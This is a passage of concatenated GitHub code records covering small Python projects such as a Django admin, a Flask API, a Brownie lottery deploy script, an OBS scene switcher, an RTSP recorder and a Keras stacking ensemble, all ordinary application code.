20)\npyplot.show()\n\n# Scatter Matrix / 
Pairplot\npairplot(dataset, hue = 'class')\npyplot.show()\n\n\n\n\n\n\n\n\n\n","repo_name":"DominicFox/Iris-Dataset-First-ML-Project","sub_path":"IrisDatasetVisualisation.py","file_name":"IrisDatasetVisualisation.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"18963172704","text":"import requests\nimport os\n\nos.system(\"cls\")\nurl = \"http://www.e-happy.com.tw\"\nhtml = requests.get(url)\nhtml.encoding = \"utf-8\"\nhtmllist = html.text.splitlines()\ni = 0\nfor row in htmllist:\n print(i, row)\n i = i+1\n if i > 10:\n break\n","repo_name":"paicheng/python_beginner_course","sub_path":"ch5/ch5.2/ch5.2.1_requests.py","file_name":"ch5.2.1_requests.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"19366252953","text":"from django.contrib import admin\nfrom blog.models import Comment\n\n# Register your models here.\n\n\nfrom blog.models import Post\n\n\nclass PostAdmin(admin.ModelAdmin):\n list_display = [\"title\"]\n\n\nclass CommentAdmin(admin.ModelAdmin):\n def post_name(self, instance):\n return instance.post.title\n\n list_display = [\"author\", \"post_name\"]\n search_fields = [\"post_name\"]\n\n\nadmin.site.register(Post, PostAdmin)\nadmin.site.register(Comment,CommentAdmin)","repo_name":"thecount12/rapidpythonprogramming","sub_path":"chapter13/fooblah/blog/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"6"} +{"seq_id":"43137484471","text":"import sqlite3\nfrom imdb import IMDb\n\n\ndef get_imdb_movie(db, title, year):\n if type(db) == str:\n con = sqlite3.connect(db)\n else:\n con = db\n cur = con.cursor()\n cur.execute('''select id from movies\n where movie=? and year=?''', (title, year))\n result = cur.fetchall()\n if len(result) == 0:\n ia = IMDb()\n search = ia.search_movie(' '.join((title, year)))\n if len(search) > 0:\n print('Movie to search for: {} ({})'.format(title, year))\n for i,m in enumerate(search):\n t = m['title'] if 'title' in m.keys() else None\n y = m['year'] if 'year' in m.keys() else None\n print('({}) {} ({})'.format(i+1, t, y))\n num = input('Which movie did you watch (0 for none of these)? 
')\n try:\n n = int(num)\n except:\n n = 0\n if n>0:\n # Get the IMDB id number\n movie = search[n-1]\n idnum = movie.getID()\n else:\n idnum = input('Enter idnum manually: ')\n movie = ia.get_movie(idnum)\n\n t = movie['title'] if 'title' in movie.keys() else title\n y = movie['year'] if 'year' in movie.keys() else year\n\n # Add movie into movies\n cur.execute('''insert into movies(id, movie, year)\n values (?, ?, ?)''', (idnum, t, y))\n con.commit()\n else:\n print('No possible movies found')\n\n # Need to choose a random, negative id number\n from numpy.random import randint\n cur.execute('select id from movies')\n ids_temp = cur.fetchall()\n all_ids = [i[0] for i in ids_temp]\n\n idnum = all_ids[0]\n while idnum in all_ids:\n idnum = randint(-100000, -1)\n movie = {'title':title, 'year':year}\n elif len(result) == 1:\n idnum = result[0][0]\n else:\n assert 0, 'Movie in database is duplicated.'\n\n if type(db) == str:\n con.close()\n return idnum, movie\n","repo_name":"mburger-stsci/movieganizer","sub_path":"get_imdb_movie.py","file_name":"get_imdb_movie.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"39067864127","text":"from brownie import Lottery, accounts, network, config\nfrom scripts.helpful_scripts import get_account, get_contract, fund_with_link\nimport time\n\n\ndef deploy_lottery():\n # account = get_account(id=\"freecodecamp-account\")\n account = get_account()\n\n # check the constructor to get all the needed parameters\n lottery = Lottery.deploy(\n get_contract(\"eth_usd_price_feed\").address,\n get_contract(\"vrf_coordinator\").address,\n get_contract(\"link_token\").address,\n config[\"networks\"][network.show_active()][\"fee\"],\n config[\"networks\"][network.show_active()][\"keyhash\"],\n {\"from\": account},\n # verify is set to default = False\n publish_source=config[\"networks\"][network.show_active()].get(\"verify\", False),\n )\n print(\"Deployed Lottery !\")\n return lottery\n\n\ndef start_lottery():\n account = get_account()\n lottery = Lottery[-1]\n starting_tx = lottery.startLottery({\"from\": account})\n starting_tx.wait(1)\n print(\"Lottery started!\")\n\n\ndef enter_lottery():\n account = get_account()\n lottery = Lottery[-1]\n # just add a little something to be sure it's above entrance fee\n value = lottery.getEntranceFee() + 100000000\n tx = lottery.enter({\"from\": account, \"value\": value})\n tx.wait(1)\n print(\"You entered the lottery!\")\n\n\ndef end_lottery():\n account = get_account()\n lottery = Lottery[-1]\n # fund the contract\n # then end the lottery\n tx = fund_with_link(lottery.address)\n tx.wait(1)\n ending_transaction = lottery.endLottery({\"from\": account})\n # here there is a difference because we MUST wait for the chainlink node to respond and make\n # the transaction, so it is essential to wait at least a few blocks for the\n # transaction to be executed by the chainlink node and recorded in the blockchain\n ending_transaction.wait(1)\n # we wait 180 seconds, which should be enough for the transaction to be executed\n # in the video it is 60 seconds, but that is not enough:\n # time.sleep(60)\n time.sleep(180)\n print(f\"{lottery.recentWinner()} is the new winner!\")\n\n\ndef main():\n deploy_lottery()\n start_lottery()\n enter_lottery()\n 
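# editorial note (not in the original source): end_lottery() below must run last;\n # it funds the contract with LINK and then waits on the Chainlink VRF response\n # before the winner can be read back\n 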
end_lottery()\n","repo_name":"micha1805/smartcontractLottery","sub_path":"scripts/deploy_lottery.py","file_name":"deploy_lottery.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30122833957","text":"from Deck.Button import Button\nfrom Deck.Module import Module\n\nfrom Messages.OBS import *\n\nclass SceneSwitcher(Module):\n def __init__(self, timestamp_manager):\n super().__init__(bg_color = \"#111111\")\n self._timestamp_manager = timestamp_manager\n \n self._sbs = False\n \n bg = \"#440000\"\n self.set_button(0, 0, SceneSwitchButton(self, \"Start\", \"Screen Start\", bg))\n self.set_button(0, 1, SceneSwitchButton(self, \"Break\", \"Screen Break\", bg))\n self.set_button(0, 2, SceneSwitchButton(self, \"End\", \"Screen End\", bg))\n \n bg = \"#004400\"\n self.set_button(1, 0, SceneSwitchButton(self, \"Cam\", \"Cam A\", bg))\n self.set_button(1, 1, SceneSwitchButton(self, \"Cam+\\nGame\", \"Cam A + Game A\", bg))\n self.set_button(1, 2, SceneSwitchButton(self, \"Room\\nCam\", \"Cam Room\", bg))\n \n bg = \"#000044\"\n self.set_button(2, 0, SceneSwitchButton(self, \"Game\\n+Cam\", \"Game A + Cam A\", bg, True))\n self.set_button(2, 1, SceneSwitchButton(self, \"Game\", \"Game A\", bg, True))\n self.set_button(2, 2, SceneSwitchButton(self, \"Game\\nonly\", \"Game A only\", bg))\n \n #self.set_button(3, 2, SBSToggleButton(self))\n self.set_button(3, 2, ABToggleButton(self))\n\nclass SceneSwitchButton(Button):\n def __init__(self, module, display_name, scene_name, bg_color, has_sbs_variant = False):\n super().__init__(text = display_name, bg_color = bg_color)\n self._module = module\n self._scene_name = scene_name\n self._has_sbs_variant = has_sbs_variant\n self._scene_selected = False\n \n def border_size(self):\n return 10 if self._scene_selected else 0\n \n def pressed(self):\n scene_name = self._scene_name\n if self._module._sbs and self._has_sbs_variant:\n scene_name = scene_name + \" SBS\"\n self.send_to_backend(SwitchSceneCommand(scene_name))\n self._module._timestamp_manager.mark_all(scene_name)\n \n def recv(self, msg):\n if isinstance(msg, SwitchSceneCommand):\n self._scene_selected = msg.scene_name == self._scene_name\n self.set_dirty()\n\nclass SBSToggleButton(Button):\n def __init__(self, module):\n super().__init__()\n self._module = module\n \n def text(self):\n if self._module._sbs:\n return \"SBS is\\non\"\n else:\n return \"SBS is\\noff\"\n \n def fg_color(self):\n if self._module._sbs:\n return \"#00AA00\"\n else:\n return \"#0000EE\"\n \n def pressed(self):\n self._module._sbs = not self._module._sbs\n\nclass ABToggleButton(Button):\n def __init__(self, module):\n super().__init__()\n self._module = module\n \n def text(self):\n return \"A/B\"\n \n def pressed(self):\n self.send_to_backend(SwitchABCommand())\n","repo_name":"OchiZockt/OZ-StreamDeck","sub_path":"Modules/SceneSwitcher.py","file_name":"SceneSwitcher.py","file_ext":"py","file_size_in_byte":2933,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"14276216121","text":"from flask import Flask, request, jsonify\nfrom flask_restful import Resource, Api, reqparse\nfrom clases.materiales.materiales import materiales, get_material, eliminar_material, modificar_material, get_all\nfrom middlewares.middlewares import authentication\nimport psycopg2\nfrom errors import errorHandling\n\nclass Materiales(Resource):\n def options(self):\n pass\n def post(self):\n 
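# Require a valid token from the 'authentication' header (read just below) before saving.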
token = request.headers.get(\"authentication\")\n user = authentication(token)\n if user:\n info = request.get_json(force=True)\n id = info[\"id\"]\n nombre = info[\"nombre\"]\n costo_unitario = info[\"costo\"]\n material = materiales(id,nombre,costo_unitario)\n material = material.save()\n if isinstance(material, tuple):\n return {\"mensaje\": errorHandling(material[1], material[2])},501 \n return {\"mensaje\": \"exito al guardar material\"},201\n else:\n return {\"mensaje\": \"error, necesita autenticarse\"},401\n def get(self):\n token = request.headers.get(\"authentication\")\n user = authentication(token)\n if user:\n data = get_all()\n if (data[0]) == False:\n return {\"mensaje\": errorHandling(data[1], data[2])},501 \n return {\"materiales\":data},200\n else:\n return {\"mensaje\": \"error, necesita autenticarse\"},401\n\nclass MaterialesParametro(Resource):\n def options(self):\n pass\n def put(self, id):\n token = request.headers.get(\"authentication\")\n user = authentication(token)\n if user:\n info = request.get_json(force = True)\n nombre = info[\"nombre\"]\n costo_unitario = info[\"costo_unitario\"]\n material = modificar_material(id,nombre,costo_unitario)\n if isinstance(material, tuple):\n return {\"mensaje\": errorHandling(material[1], material[2])},501 \n return {\"mensaje\":\"material modificado correctamente\"}\n else:\n return {\"mensaje\": \"error se necesita estar autenticado\"},400\n \n def get(self,id):\n token = request.headers.get(\"authentication\")\n user = authentication(token)\n if user:\n data = get_material(id)\n if isinstance(data,tuple):\n return {\"mensaje\": errorHandling(data[1], data[2])},501 \n else:\n return {\"material\":data},201\n else:\n return {\"mensaje\": \"error se necesita estar autenticado\"},400\n\n def delete(self,id):\n token = request.headers.get(\"authentication\")\n user = authentication(token)\n permission = user[\"permission\"]\n if user and permission == 'ADMIN':\n data = eliminar_material(id)\n if isinstance(data,tuple):\n return {\"mensaje\": errorHandling(data[1], data[2])},501 \n return {\"mensaje\":\"material eliminado\"}\n else:\n return {\"mensaje\": \"error se necesita estar autenticado\"},400\n ","repo_name":"JaredJHZ/workreports_backend","sub_path":"controllers/materiales.py","file_name":"materiales.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"17649521847","text":"# deploying model on Roboflow\n\nproject.version(dataset.version).deploy(model_type=\"yolov8\", model_path=f\"{HOME}/runs/detect/train/\")\n\n#Run inference on your model on a persistant, auto-scaling, cloud API\n\n#load model\nmodel = project.version(dataset.version).model\n\n#choose random test set image\nimport os, random\ntest_set_loc = dataset.location + \"/test/images/\"\nrandom_test_image = random.choice(os.listdir(test_set_loc))\nprint(\"running inference on \" + random_test_image)\n\npred = model.predict(test_set_loc + random_test_image, confidence=40, overlap=30).json()\npred\n","repo_name":"Abhisri25/YOLOv8-Licence-Plate-Detection","sub_path":"Deploy.py","file_name":"Deploy.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"4769293557","text":"#!/bin/env python3\nimport cv2\nimport numpy as np\nfrom time import time, gmtime, strftime\nimport os\n\nsuffix = 'Coquitlam Dam.mp4'\ninterval = 3600 # In seconds\nfps = 25\nsave_folder = 
'save'\n\ncodec = cv2.VideoWriter_fourcc(*'mp4v')\n\ncap = cv2.VideoCapture('rtsp://11.0.0.106/av0_0')\n\n# Check if camera opened successfully\nif (cap.isOpened()== False):\n print(\"Error opening video stream or file\")\n\n\nstart = time()\ntimme = strftime(\"%m-%d-%Y %H-%M-%S\", gmtime())\nfilename = os.path.join(save_folder, f\"{timme} {suffix}\")\nv_out = cv2.VideoWriter(filename, codec, fps, \n (int(cap.get(cv2.CAP_PROP_FRAME_WIDTH)), int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))))\nprint(f\"Recording to {filename}\")\n\n# Read until video is completed\nwhile(cap.isOpened()):\n # Capture frame-by-frame\n ret, frame = cap.read()\n if ret == True:\n\n # Display the resulting frame\n #cv2.imshow('Frame',frame)\n\n now = time()\n if now - start > interval:\n start = now\n timme = strftime(\"%m-%d-%Y %H-%M-%S\", gmtime())\n filename = os.path.join(save_folder, f\"{timme} {suffix}\")\n v_out.release()\n v_out = cv2.VideoWriter(filename, codec, fps, \n (int(cap.get(cv2.CAP_PROP_FRAME_WIDTH)), int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))))\n print(f\"Recording to {filename}\")\n\n v_out.write(frame)\n\n # Press Q on keyboard to exit\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n # Break the loop\n else:\n break\n\n# When everything done, release the video capture object\ncap.release()\n\n# Closes all the frames\ncv2.destroyAllWindows()\n","repo_name":"Salmon-Computer-Vision/salmon-computer-vision","sub_path":"utils/cam.py","file_name":"cam.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"} +{"seq_id":"36396567745","text":"\"\"\"\nComputes continuous value metrics given an agreement map.\n\"\"\"\n\n# __all__ = ['*']\n__author__ = \"Fernando Aristizabal\"\n\nfrom typing import Iterable, Union, List\n\nimport numpy as np\nimport pandera as pa\nimport pandas as pd\nfrom pandera.typing import DataFrame\nimport xarray as xr\nimport geopandas as gpd\nimport dask as da\n\nfrom gval import ContStats\nfrom gval.utils.schemas import Metrics_df, Subsample_identifiers, Sample_identifiers\nfrom gval.utils.loading_datasets import _check_dask_array, _convert_to_dataset\n\n\ndef _get_selected_datasets(\n agreement: xr.Dataset,\n candidate: xr.Dataset,\n benchmark: xr.Dataset,\n nodata: list,\n var_name: str,\n) -> List[xr.Dataset]:\n \"\"\"\n Selects specific coordinates for integer valued datasets to not process nodata values\n\n Parameters\n ----------\n agreement : xr.Dataset\n Agreement Map\n candidate : xr.Dataset\n Candidate Map\n benchmark : xr.Dataset\n Benchmark Map\n nodata : list\n Nodata values in the list\n var_name : str\n Name of variable\n\n Returns\n -------\n List[xr.Dataset, xr.Dataset, xr.Dataset]\n Datasets with selected coordinates\n \"\"\"\n\n is_dsk = _check_dask_array(agreement)\n cmask, bmask = (\n xr.where(candidate[var_name] == nodata, 0, 1),\n xr.where(benchmark[var_name] == nodata, 0, 1),\n )\n tmask = cmask & bmask\n\n # Create a coord meshgrid and select appropriate coords to select from xarray\n if is_dsk:\n with da.config.set({\"array.slicing.split_large_chunks\": True}):\n grid_coords = da.array.asarray(\n da.array.meshgrid(candidate.coords[\"x\"], candidate.coords[\"y\"])\n ).T.reshape(-1, 2)\n picked_coords = grid_coords[da.array.ravel(tmask.data).astype(bool), :]\n else:\n grid_coords = np.array(\n np.meshgrid(candidate.coords[\"x\"], candidate.coords[\"y\"])\n ).T.reshape(-1, 2)\n picked_coords = grid_coords[np.ravel(tmask.data).astype(bool), :]\n\n # Select coordinates from xarray\n 
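# (Hedged illustration, not from the original file: grid_coords flattens the\n# x/y meshgrid into rows of (x, y) pairs, and the ravelled 0/1 mask keeps only\n# the rows whose pixel is valid in BOTH maps; e.g. a mask of [1, 0, 0, 1] over\n# four pairs keeps the first and last coordinate pair.)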
with da.config.set({\"array.slicing.split_large_chunks\": True}):\n agreement_sel = (\n agreement[var_name].sel(\n {\"x\": picked_coords[:, 0], \"y\": picked_coords[:, 1]}\n )\n if picked_coords is not None\n else agreement[var_name]\n )\n\n candidate_sel = (\n candidate[var_name].sel(\n {\"x\": picked_coords[:, 0], \"y\": picked_coords[:, 1]}\n )\n if picked_coords is not None\n else candidate[var_name]\n )\n\n benchmark_sel = (\n benchmark[var_name].sel(\n {\"x\": picked_coords[:, 0], \"y\": picked_coords[:, 1]}\n )\n if picked_coords is not None\n else benchmark[var_name]\n )\n\n return (\n agreement_sel,\n candidate_sel,\n benchmark_sel,\n )\n\n\n@pa.check_types\ndef _compute_continuous_metrics(\n agreement_map: Union[xr.DataArray, xr.Dataset],\n candidate_map: Union[xr.DataArray, xr.Dataset],\n benchmark_map: Union[xr.DataArray, xr.Dataset],\n metrics: Union[str, Iterable[str]] = \"all\",\n subsampling_average: str = \"micro\",\n subsampling_df: gpd.GeoDataFrame = None,\n) -> DataFrame[Metrics_df]:\n \"\"\"\n Computes continuous metrics.\n\n Parameters\n ----------\n agreement_map : Union[xr.DataArray, xr.Dataset, List[Union[xr.DataArray, xr.Dataset]]]\n Agreement map, error based (candidate - benchmark).\n candidate_map : Union[xr.DataArray, xr.Dataset]\n Candidate map.\n benchmark_map : Union[xr.DataArray, xr.Dataset]\n Benchmark map.\n metrics : Union[str, Iterable[str]], default = \"all\"\n String or list of strings representing metrics to compute.\n subsampling_average : str, default = \"micro\"\n Strategy to average samples if there is more than one in the agreement map\n subsampling_df : gpd.GeoDataFrame, default = None\n DataFrame with geometries to subsample or use as exclusionary masks and optional sample weights\n\n Returns\n -------\n DataFrame[Metrics_df]\n Metrics DF with computed metrics per sample.\n\n Raises\n ------\n ValueError\n If metrics is not a string or list of strings.\n\n References\n ----------\n .. [1] `7th International Verification Methods Workshop `_\n .. [2] `3.3. 
Metrics and scoring: quantifying the quality of predictions `_\n \"\"\"\n\n if not isinstance(agreement_map, list):\n agreement_map = [agreement_map]\n candidate_map = [candidate_map]\n benchmark_map = [benchmark_map]\n\n metric_dfs = []\n for idx, (agreement, benchmark, candidate) in enumerate(\n zip(agreement_map, benchmark_map, candidate_map)\n ):\n # Change data to Dataset if DataArray\n agreement = _convert_to_dataset(agreement)\n candidate = _convert_to_dataset(candidate)\n benchmark = _convert_to_dataset(benchmark)\n\n # Check if integer type and nodata values\n is_int = (\n np.issubdtype(candidate.dtype, np.integer)\n if isinstance(candidate, xr.DataArray)\n else np.issubdtype(candidate[\"band_1\"].dtype, np.integer)\n )\n nodata = [agreement[x].rio.nodata for x in agreement.data_vars]\n\n # Remove no data value if int type form calculation, otherwise leave all values in\n # Necessary because there is not an int sentinel value\n if is_int and np.all([x is not None for x in nodata]):\n final_stats = []\n # Iterate through each band and gather statistics\n for nodata_idx, var_name in enumerate(agreement.data_vars):\n # Create mask for all nodata values\n agreement_sel, candidate_sel, benchmark_sel = _get_selected_datasets(\n agreement, candidate, benchmark, nodata[nodata_idx], var_name\n )\n\n statistics, names = ContStats.process_statistics(\n metrics,\n error=agreement_sel,\n candidate_map=candidate_sel,\n benchmark_map=benchmark_sel,\n )\n\n del agreement_sel, candidate_sel, benchmark_sel\n\n final_stats.append(statistics)\n\n statistics = [\n {f\"band_{idx + 1}\": val for idx, val in enumerate(lst)}\n for lst in np.array(final_stats).T\n ]\n\n else:\n statistics, names = ContStats.process_statistics(\n metrics,\n error=agreement,\n candidate_map=candidate,\n benchmark_map=benchmark,\n )\n\n # create metrics_df\n metric_df = dict()\n for name, stat in zip(names, statistics):\n metric_df[name] = stat\n\n def is_nested_dict(d):\n # if not isinstance(d, dict):\n # return False\n return any(isinstance(v, dict) for v in d.values())\n\n if is_nested_dict(metric_df):\n metric_df = pd.DataFrame.from_dict(metric_df, orient=\"index\").transpose()\n metric_df.reset_index(inplace=True)\n metric_df.rename(columns={\"index\": \"band\"}, inplace=True)\n metric_df[\"band\"] = metric_df[\"band\"].str.replace(\"band_\", \"\")\n\n else:\n # dataarray\n metric_df = pd.DataFrame(metric_df, index=[0])\n\n # add band\n metric_df.insert(0, \"band\", \"1\")\n\n if subsampling_df is not None:\n metric_df.insert(0, \"subsample\", f\"{idx + 1}\")\n\n metric_dfs.append(metric_df)\n\n metric_df = pd.concat(metric_dfs).reset_index().drop(columns=[\"index\"])\n\n if subsampling_df is not None:\n if subsampling_average == \"band\":\n metric_df = (\n metric_df.groupby(Subsample_identifiers.columns())\n .mean(numeric_only=True)\n .reset_index()\n )\n\n metric_df.insert(1, \"band\", \"averaged\")\n\n if subsampling_average == \"subsample\":\n metric_df = (\n metric_df.groupby(Sample_identifiers.columns())\n .mean(numeric_only=True)\n .reset_index()\n )\n\n metric_df.insert(0, \"subsample\", \"averaged\")\n\n if subsampling_average == \"weighted\":\n if subsampling_df.get(\"weights\") is None:\n raise ValueError(\n \"Must have weights if weighted is chosen for subsampling\"\n ) # pragma: no cover\n\n metric_df.loc[:, \"weights\"] = subsampling_df[\"weights\"]\n\n # compute weighted average\n weighted_metrics = (\n metric_df.loc[:, metrics]\n .multiply(metric_df.loc[:, \"weights\"], axis=0)\n .reset_index(drop=True)\n 
)\n\n # add weighted metrics to metric_df\n metric_df.loc[:, metrics] = weighted_metrics\n\n # take average of weighted metrics\n metric_df = (\n metric_df.groupby(Sample_identifiers.columns())\n .sum(numeric_only=True)\n .drop(\n columns=[\"weights\", \"subsample\"],\n errors=\"ignore\",\n )\n .divide(metric_df.loc[:, \"weights\"].sum())\n .reset_index()\n )\n\n metric_df.insert(0, \"subsample\", \"averaged\")\n\n return metric_df\n","repo_name":"NOAA-OWP/gval","sub_path":"src/gval/comparison/compute_continuous_metrics.py","file_name":"compute_continuous_metrics.py","file_ext":"py","file_size_in_byte":9524,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"6"} +{"seq_id":"27528355861","text":"from django import forms\nfrom .models import Attendant, EventDetail\n\n\nclass AttendantCreateForm(forms.ModelForm):\n class Meta:\n model = Attendant\n fields = ('day', 'name', 'level', 'phone_number',\n 'visitor', 'department', 'email', 'sex')\n\n def __init__(self, *args, **kwargs):\n super(AttendantCreateForm, self).__init__(*args, **kwargs)\n self.fields['day'].widget.attrs['placeholder'] = 'day'\n self.fields['day'].help_text = 'select the day of the event'\n self.fields['day'].label = ''\n\n self.fields['name'].help_text = 'Enter Your Full Name'\n self.fields['name'].widget.attrs['placeholder'] = 'your name'\n self.fields['name'].label = ''\n\n\n self.fields['level'].help_text = 'What level are you?'\n self.fields['level'].widget.attrs['placeholder'] = 'level'\n self.fields['level'].label = ''\n\n\n self.fields['phone_number'].help_text = 'Enter your Mobile Number: 08103304043'\n self.fields['phone_number'].widget.attrs['placeholder'] = 'Your Mobile Number'\n self.fields['phone_number'].label = ''\n\n\n self.fields['visitor'].help_text = 'Select if you are visitor from the drop down'\n self.fields['visitor'].label = ''\n\n\n self.fields['department'].help_text = 'What department are you?'\n self.fields['department'].widget.attrs['placeholder'] = 'your department'\n self.fields['department'].label = ''\n\n\n self.fields['email'].help_text = 'Your Email Address.'\n self.fields['email'].widget.attrs['placeholder'] = 'Your E-mail Address'\n self.fields['email'].label = ''\n\n self.fields['sex'].help_text = 'Select your Sex Male | Female.'\n self.fields['sex'].label = ''\n\n\n\nclass EventCreateForm(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super(EventCreateForm, self).__init__(*args, **kwargs)\n # self.fields['date'].disabled = True\n self.fields['date'].label = ''\n self.fields['date'].help_text = 'The date is generated Automatically (YYYY-MM-DD). '\n\n self.fields['event_name'].help_text = 'Enter the name of the event... 
'\n self.fields['event_name'].widget.attrs['placeholder'] = 'name of the event...'\n self.fields['event_name'].label = ''\n class Meta:\n model = EventDetail\n exclude = ['year', 'slug']\n","repo_name":"Afeez1131/MSSNEvent-app","sub_path":"event_app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"31282154083","text":"\"\"\" Functions to deal with big Query\"\"\"\nimport pandas as pd\n\nPROJECT_ID = \"data-analytics-platform-206914\"\n\n\ndef read_bq_data(query):\n \"\"\"Read a table from BQ\"\"\"\n result_df = pd.read_gbq(\n query=query,\n project_id=PROJECT_ID,\n # private_key=GOOGLE_CREDENTIALS,\n dialect=\"standard\",\n )\n return result_df\n","repo_name":"chechir/doors","sub_path":"doors/bq.py","file_name":"bq.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8190790589","text":"# stacked generalization with neural net meta model on blobs dataset\nfrom sklearn.datasets import make_blobs\nfrom sklearn.metrics import accuracy_score\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.utils import plot_model\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Input\nfrom tensorflow.keras.layers import Dense\nfrom keras.layers.merge import concatenate\nfrom numpy import argmax\n\n# When using neural networks as sub-models, it may be desirable to use\n# a neural network as a meta-learner.\n\n\n\n# load models from file\ndef load_all_models(n_models):\n all_models = list()\n for i in range(n_models):\n # define filename for this ensemble\n filename = 'models/model_' + str(i + 1) + '.h5'\n # load model from file\n model = load_model(filename)\n # add to list of members\n all_models.append(model)\n print('>loaded %s' % filename)\n return all_models\n\n# Once the sub-models have been prepared, we can define the stacking ensemble model.\n#\n# The input layer for each of the sub-models will be used as a separate input\n# head to this new model. This means that k copies of any input data will have to\n# be provided to the model, where k is the number of input models, in this case, 5.\n#\n# The outputs of each of the models can then be merged. In this case, we will use a\n# simple concatenation merge, where a single 15-element vector will be created from the\n# three class-probabilities predicted by each of the 5 models.\n#\n# We will then define a hidden layer to interpret this “input” to the meta-learner and an\n# output layer that will make its own probabilistic prediction. 
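#\n# (Hedged sketch, not part of the original script: the concatenation merge\n# described above, shown for two hypothetical 3-class sub-models; the names\n# model_a and model_b are illustrative only.)\n#\n#   merged = concatenate([model_a.output, model_b.output])  # 6-element vector\n#   hidden = Dense(10, activation='relu')(merged)\n#   meta_out = Dense(3, activation='softmax')(hidden)\n#   meta = Model(inputs=[model_a.input, model_b.input], outputs=meta_out)\n#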
The define_stacked_model()\n# function below implements this and will return a stacked generalization neural network model\n# given a list of trained sub-models.\n\n# define stacked model from multiple member input models\ndef define_stacked_model(members):\n # update all layers in all models to not be trainable\n for i in range(len(members)):\n model = members[i]\n for layer in model.layers:\n # make not trainable\n layer.trainable = False\n # rename to avoid 'unique layer name' issue\n layer._name = 'ensemble_' + str(i + 1) + '_' + layer.name\n # define multi-headed input\n ensemble_visible = [model.input for model in members]\n # concatenate merge output from each model\n ensemble_outputs = [model.output for model in members]\n merge = concatenate(ensemble_outputs)\n hidden = Dense(10, activation='relu')(merge)\n output = Dense(3, activation='softmax')(hidden)\n model = Model(inputs=ensemble_visible, outputs=output)\n # plot graph of ensemble\n # Visualization of Stacked Generalization Ensemble of Neural Network Models\n plot_model(model, show_shapes=True, to_file='model_graph.png')\n # compile\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n return model\n\n\n# fit a stacked model\ndef fit_stacked_model(model, inputX, inputy):\n # prepare input data\n X = [inputX for _ in range(len(model.input))]\n # encode output data\n inputy_enc = to_categorical(inputy)\n # fit model\n model.fit(X, inputy_enc, epochs=300, verbose=0)\n\n\n# make a prediction with a stacked model\ndef predict_stacked_model(model, inputX):\n # prepare input data\n X = [inputX for _ in range(len(model.input))]\n # make prediction\n return model.predict(X, verbose=0)\n\n\n# generate 2d classification dataset\nX, y = make_blobs(n_samples=1100, centers=3, n_features=2, cluster_std=2, random_state=2)\n# split into train and test\nn_train = 100\ntrainX, testX = X[:n_train, :], X[n_train:, :]\ntrainy, testy = y[:n_train], y[n_train:]\nprint(trainX.shape, testX.shape)\n# load all models\nn_members = 5\nmembers = load_all_models(n_members)\nprint('Loaded %d models' % len(members))\n# define ensemble model\nstacked_model = define_stacked_model(members)\n# fit stacked model on test dataset\nfit_stacked_model(stacked_model, testX, testy)\n# make predictions and evaluate\nyhat = predict_stacked_model(stacked_model, testX)\nyhat = argmax(yhat, axis=1)\nacc = accuracy_score(testy, yhat)\nprint('Stacked Test Accuracy: %.3f' % acc)\n","repo_name":"aghorab/Ensemble_Learning_Ghorab_Project","sub_path":"stacked_for_multiclass_classification_with_nn_meta_learner_7.py","file_name":"stacked_for_multiclass_classification_with_nn_meta_learner_7.py","file_ext":"py","file_size_in_byte":4275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"16463815651","text":"import random\nimport statistics\nimport time\n\nclass Params:\n def __init__(self):\n self.m = None\n self.set_options_and_defaults()\n\n self.id = -2 # negative ids for maintaining code default versions\n self.results = []\n self.last_result = None # temp variable to store last result, will be appended to results when stored\n\n\n def assign_monitor(self, monitor):\n self.m = monitor\n self.set_basic_parameters()\n\n\n def set_basic_parameters(self):\n if self.m.ticker_code() == \"ES\":\n self.tick_price = 0.25\n self.price_precision = 2\n self.dollar_multiplier = 50\n \n elif self.m.ticker_code() == \"NQ\":\n self.tick_price = 0.25\n self.price_precision = 2\n self.dollar_multiplier = 
